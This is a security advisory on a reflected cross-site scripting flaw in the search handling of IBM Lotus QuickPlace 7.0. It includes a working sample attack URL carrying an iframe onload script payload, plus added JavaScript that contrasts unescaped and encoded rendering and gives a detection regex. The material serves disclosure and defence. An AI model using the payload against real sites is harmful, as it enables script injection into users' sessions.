IBM Lotus QuickPlace is "a business-ready, self-service work space expressly designed for team collaboration". A vulnerability in the way IBM Lotus QuickPlace handles incoming search requests allows an attacker to inject arbitrary HTML and/or JavaScript (cross-site scripting): the search string supplied in the request is reflected into the search results page without being encoded, so a crafted link executes script in the context of the QuickPlace site for any user who follows it.
Credit:
The information has been provided by Nir Goldshlager (Avnet Israel).
Vulnerable Systems:
* IBM Lotus QuickPlace version 7.0
Exploit:
The following is a sample attack string (shown URL-decoded; the injected payload is the value of the h_SearchString field inside the PreSetFields parameter):
http://website/QuickPlace/leg/Main.nsf/h_Toc/$new/?EditDocument&Form=h_RemoteUI&PreSetFields=h_EditAction;h_New,h_SetReadScene;h_StdPageRead,h_SetEditScene;h_RemoteSearchResults,h_ReturnToPage;B4F8E49FCF2698BE862573F100705440,h_SetRemote;1,h_SearchString;<iframe/ /onload=alert(/XSSByNirG/)></iframe,h_SearchAuthor;,h_SearchDate;,h_SearchDateTypeString;,h_SearchOrder;,h_SearchCount;15,h_SearchStart;0,h_SetErrorScene;h_RemoteError,h_SetEditCurrentScene;h_RemoteSearchResults,h_SetQuickBrowse;1,h_SearchFolderScope;,h_SearchRoomScope;,h_SearchType;
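The following is an added example, not code from the advisory or from IBM: it models how a PreSetFields parameter of the shape shown above ("fieldName;value" entries separated by commas) carries the search string, contrasts a page that reflects h_SearchString unescaped with one that HTML-encodes it, and adds a crude check a log scanner or WAF rule could apply to the decoded parameter. The parsing rules, the render functions and the sample value are assumptions for illustration, not QuickPlace's own code.

```javascript
// Added example (not part of the original advisory, not QuickPlace code).
// Assumed format, taken from the sample URL: PreSetFields is a comma-separated
// list of "fieldName;value" entries, e.g. "h_SearchCount;15,h_SearchStart;0".
function parsePreSetFields(preSetFields) {
  const fields = {};
  for (const entry of preSetFields.split(',')) {
    const sep = entry.indexOf(';');
    if (sep === -1) continue;               // malformed entry: no name/value separator
    const name = entry.slice(0, sep).trim();
    fields[name] = entry.slice(sep + 1);    // value may legitimately be empty
  }
  return fields;
}

// Escape the characters that break out of HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the user-supplied search string is concatenated into
// the results page as-is, so any tag inside it becomes live markup.
function renderSearchResultsVulnerable(fields) {
  const q = fields.h_SearchString || '';
  return `<p>Results for: ${q}</p>`;
}

// Hardened rendering: same output structure, but the untrusted value is
// HTML-encoded before it reaches the page.
function renderSearchResultsSafe(fields) {
  const q = fields.h_SearchString || '';
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Heuristic for a log scanner or WAF rule applied to the decoded parameter:
// flag any field value that opens a tag or carries an inline event handler.
function looksLikeSearchXss(fields) {
  return Object.values(fields).some(v => /<\s*[a-z]|\bon[a-z]+\s*=/i.test(v));
}

// Constructed sample: a subset of the advisory's PreSetFields value, URL-decoded.
const SAMPLE_PRESETFIELDS =
  'h_EditAction;h_New,h_SetReadScene;h_StdPageRead,' +
  'h_SetEditScene;h_RemoteSearchResults,' +
  'h_SearchString;<iframe/ /onload=alert(/XSSByNirG/)></iframe,' +
  'h_SearchAuthor;,h_SearchDate;,h_SearchCount;15,h_SearchStart;0';

const parsedSample = parsePreSetFields(SAMPLE_PRESETFIELDS);
console.log(renderSearchResultsVulnerable(parsedSample)); // payload survives intact
console.log(renderSearchResultsSafe(parsedSample));       // < and > become &lt; and &gt;
console.log('suspicious:', looksLikeSearchXss(parsedSample));
```

The hardened renderer is the fix pattern the advisory implies: every field taken from PreSetFields is untrusted and must be output-encoded for the context it lands in. The regex check is deliberately loose and will produce false positives on ordinary text; treat it as a triage signal, not a filter.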
Vendor response:
The product is no longer being sold; any active customer concerned about this vulnerability should contact IBM Lotus QuickPlace support.